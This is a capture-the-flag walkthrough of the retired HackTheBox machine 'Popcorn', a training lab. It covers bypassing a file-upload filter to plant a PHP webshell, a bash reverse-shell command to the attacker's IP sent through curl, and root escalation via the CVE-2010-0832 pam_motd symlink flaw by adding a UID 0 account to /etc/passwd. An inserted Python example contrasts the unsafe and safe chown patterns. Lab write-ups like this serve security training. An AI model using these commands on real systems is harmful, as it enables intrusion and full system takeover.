HackTheBox - Popcorn
| OS | Difficulty | IP Address | Status |
|---|---|---|---|
| Linux | Medium | 10.10.10.6 | Retired |
This box was rated Medium by ch4p on HackTheBox, and it appears on TJNull's list of OSCP-like boxes. While enumerating port 80, we find an instance of TorrentHoster whose screenshot upload lets us bypass its file-type filtering and upload a PHP webshell, which gives us our initial foothold. For privilege escalation, we leverage CVE-2010-0832, a symlink attack on Ubuntu's pam_motd, to take ownership of /etc/passwd and get root.
Phase 1 - Enumeration
Nmap
As usual, we start off with an Nmap scan to identify open ports:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We find only two open ports: (i) SSH on 22 and (ii) HTTP on 80.
Port 80
Navigating to the webpage on port 80, we find only a plain text page:
Directory Buster
Running a directory brute force, we find a few pages:
/index (Status: 200) [Size: 177]
/test (Status: 200) [Size: 47034]
/torrent (Status: 301) [Size: 310] [--> http://10.10.10.6/torrent/]
/rename (Status: 301) [Size: 309] [--> http://10.10.10.6/rename/]
/test
/rename
/torrent
We find TorrentHoster, which allows us to Sign Up for an account:
After we sign up and log in, we find an upload page where we can upload torrent files:
So, let's test this upload feature. We fetch a torrent file from the Kali website and upload it to TorrentHoster:
Once uploaded, we notice that we can edit the torrent's entry and add a screenshot image:
Clicking to add an image opens another upload window. It states that only certain image types are allowed:
We get an "upload successful" message, and can find the uploaded image under /torrent/upload:
Phase 2 - Exploitation
Testing Filters
There are two upload paths: one for the torrent file and one for the screenshot image. Let's test the image one. If we submit a PHP shell directly, we get "Invalid file", so there is a filter, as the upload form stated that only certain image formats are accepted.
There are three common ways for a website to check that an upload is of a valid type:
- File extension
- Content-Type header sent by the client
- Magic bytes (file signature) at the start of the content
Bypassing Filters
Keeping everything else the same and only appending .php to the filename is not blocked, so the filter does not look at the extension. So we replace the image contents with a PHP shell, name the file "cmd.php" and leave the image Content-Type in place:
And it works! The file is stored under /torrent/upload with a hashed name but our .php extension, and we have a webshell.
GET /torrent/upload/7fe3d266746cd636e0b918516570592eb93c9a8a.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.18/9001+0>%261' HTTP/1.1
Host: 10.10.10.6
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: /torrent/=; /torrent/torrents.php=; /torrent/login.php=; /torrent/index.php=; saveit_0=4; saveit_1=0; /torrent/torrents.phpfirsttimeload=0; PHPSESSID=52e42c83cd4621e503c78b6863edda94
Upgrade-Insecure-Requests: 1
┌──(kali㉿kali)-[~/CTF/HTB/machines/popcorn]
└─$ curl http://10.10.10.6/torrent/upload/0ba973670d943861fb9453eecefd3bf7d3054713.php --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.18/9001 0>&1'"
And we get in as www-data:
┌──(kali㉿kali)-[~/CTF/HTB/machines/popcorn]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.6] 41373
bash: no job control in this shell
www-data@popcorn:/home/george$ cat user.txt
Phase 3 - Privilege Escalation
CVE-2010-0832
pam_motd (aka the MOTD module) in libpam-modules before 1.1.0-2ubuntu1.1 in PAM on Ubuntu 9.10 and libpam-modules before 1.1.1-2ubuntu5 in PAM on Ubuntu 10.04 LTS allows local users to change the ownership of arbitrary files via a symlink attack on .cache in a user’s home directory, related to “user file stamps” and the motd.legal-notice file.
In short, CVE-2010-0832 is a vulnerability in the MOTD module of Ubuntu's PAM (Pluggable Authentication Modules) that lets a local user become the owner of any file on the system.
www-data@popcorn:/home/george/.cache$ ls -la
...[snip]...
-rw-r--r-- 1 george george 0 Mar 17 2017 motd.legal-displayed
...[snip]...
That file is an empty stamp, not a script: pam_motd creates the .cache directory and the stamp as root when a new session is opened (in other words, at logout and login) and then changes their ownership to the user. Because that ownership change follows a symlink, replacing .cache with a symlink to a root-owned file makes that file ours. Googling around, we find an exploit script on Exploit-DB, but let's do this manually by analyzing what the script does.
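The bug class behind CVE-2010-0832, as an added Python illustration that is not pam_motd's source and not part of the original write-up: a privileged helper that creates $HOME/.cache and hands it to the user, written the way that can be abused (chown by path, which follows a planted symlink) and the way that cannot (open the directory with O_NOFOLLOW | O_DIRECTORY and chown the descriptor). The temporary directory, the stand-in passwd file and the use of our own uid/gid are constructed for the demo.

```python
"""Symlink-following chown, the bug class behind CVE-2010-0832, beside a safe variant.

Added illustration (not pam_motd's source): a privileged helper that creates
$HOME/.cache and hands it to the user, written the way that can be abused and
the way that cannot."""
import errno
import os
import tempfile


def chown_cache_unsafe(home, uid, gid):
    """Create $HOME/.cache if missing and chown it *by path*.

    chown(2) on a path follows symlinks, so if the user has replaced .cache
    with a link to /etc/passwd, the target file is what changes owner.
    Returns the path of the inode that was actually chowned."""
    cache = os.path.join(home, ".cache")
    try:
        os.mkdir(cache, 0o700)
    except FileExistsError:
        pass                       # already present, or a link planted by the user
    os.chown(cache, uid, gid)      # follows the link
    return os.path.realpath(cache)


def chown_cache_safe(home, uid, gid):
    """Same intent, but open the directory with O_NOFOLLOW | O_DIRECTORY and
    change ownership through that descriptor (fchown), so a planted symlink or a
    non-directory makes the open fail with ELOOP/ENOTDIR instead of touching the
    target. Only the last component is protected this way; the parent path must
    come from a trusted source (pam_motd takes it from the passwd entry)."""
    cache = os.path.join(home, ".cache")
    try:
        os.mkdir(cache, 0o700)
    except FileExistsError:
        pass
    fd = os.open(cache, os.O_RDONLY | os.O_NOFOLLOW | os.O_DIRECTORY)
    try:
        os.chown(fd, uid, gid)     # fchown(2): acts only on the opened inode
    finally:
        os.close(fd)
    return cache


def demo():
    """Constructed scenario: our own uid/gid, so every chown is a legal no-op on
    ownership but resolves paths exactly as it would for root."""
    uid, gid = os.getuid(), os.getgid()
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "passwd")          # stands in for /etc/passwd
        with open(victim, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n")

        home = os.path.join(tmp, "www")               # stands in for /var/www
        os.mkdir(home)
        os.symlink(victim, os.path.join(home, ".cache"))   # the write-up's ln -s

        hit = chown_cache_unsafe(home, uid, gid)
        try:
            chown_cache_safe(home, uid, gid)
            safe_error = None
        except OSError as e:
            safe_error = errno.errorcode.get(e.errno, str(e.errno))

        legit = os.path.join(tmp, "legit")            # an untampered home
        os.mkdir(legit)
        safe_ok = chown_cache_safe(legit, uid, gid) == os.path.join(legit, ".cache")

        return {
            "unsafe_chowned_target": hit == os.path.realpath(victim),
            "safe_error": safe_error,
            "safe_ok_on_real_dir": safe_ok,
        }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Run it as an unprivileged user: the unsafe helper reports that the inode it chowned is the stand-in passwd file, while the safe helper refuses the planted link with ELOOP and still works on an untampered home. Run as root against a real user's home, the unsafe version is exactly the ownership change this write-up exploits on /etc/passwd.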
SSH as www-data
We can't replace the .cache directory in george's home, because it is owned by george and we are www-data, and we can't log in as george anyway. So let's use www-data's own home directory, /var/www: create a .ssh folder there and generate an SSH key, so that we can open a real login session as www-data (SSH authenticates through PAM, which is what triggers pam_motd).
www-data@popcorn:/var/www$ mkdir .ssh
www-data@popcorn:/var/www$ ssh-keygen -q -t rsa -N '' -C 'pam'
Enter file in which to save the key (/var/www/.ssh/id_rsa):
www-data@popcorn:/var/www$ ls -la .ssh
-rw------- 1 www-data www-data 1671 Nov 10 22:05 id_rsa
-rw-r--r-- 1 www-data www-data 385 Nov 10 22:05 id_rsa.pub
www-data@popcorn:/var/www$ cp .ssh/id_rsa.pub .ssh/authorized_keys
www-data@popcorn:/var/www$ chmod 600 .ssh/authorized_keys
Then we copy the id_rsa to our machine and log in to Popcorn as www-data:
┌──(kali㉿kali)-[~/CTF/HTB/machines/popcorn]
└─$ chmod 600 id_rsa-www
┌──(kali㉿kali)-[~/CTF/HTB/machines/popcorn]
└─$ ssh -i id_rsa-www www-data@10.10.10.6
www-data@popcorn:~$
Now we notice a .cache directory in /var/www that wasn't there before our SSH login; pam_motd created it when the session opened. So let's delete .cache, replace it with a symlink to /etc/passwd, and check who currently owns /etc/passwd:
www-data@popcorn:~$ ls -la
drwxr-xr-x 2 www-data www-data 4096 2021-11-10 22:09 .cache
www-data@popcorn:~$ rm -rf .cache
www-data@popcorn:~$ ln -s /etc/passwd .cache
www-data@popcorn:~$ ls -la
lrwxrwxrwx 1 www-data www-data 11 2021-11-10 22:10 .cache -> /etc/passwd
www-data@popcorn:~$ ls -l /etc/passwd
-rw-r--r-- 1 root root 1031 2017-03-17 19:07 /etc/passwd
As we can see above, /etc/passwd is owned by root. So, let's log out and log back in:
www-data@popcorn:~$ ls -l /etc/passwd
-rw-r--r-- 1 www-data www-data 1031 2017-03-17 19:07 /etc/passwd
And now www-data owns /etc/passwd; since the mode still grants the owner write access, we can edit it. Let's generate a password hash and append a user with UID 0 and GID 0 to /etc/passwd:
www-data@popcorn:~$ openssl passwd -1 potato
$1$7ed1OlEg$5jLtFfmPRvmIyklX3.SLO1
www-data@popcorn:~$ echo 'pot:$1$7ed1OlEg$5jLtFfmPRvmIyklX3.SLO1:0:0:pwned:/root:/bin/bash' >> /etc/passwd
Finally, switch to the added user with the password we hashed (potato), and BAM!
www-data@popcorn:~$ su - pot
Password:
root@popcorn:~# id
uid=0(root) gid=0(root) groups=0(root)
root@popcorn:~# cat /root/root.txt
We are root!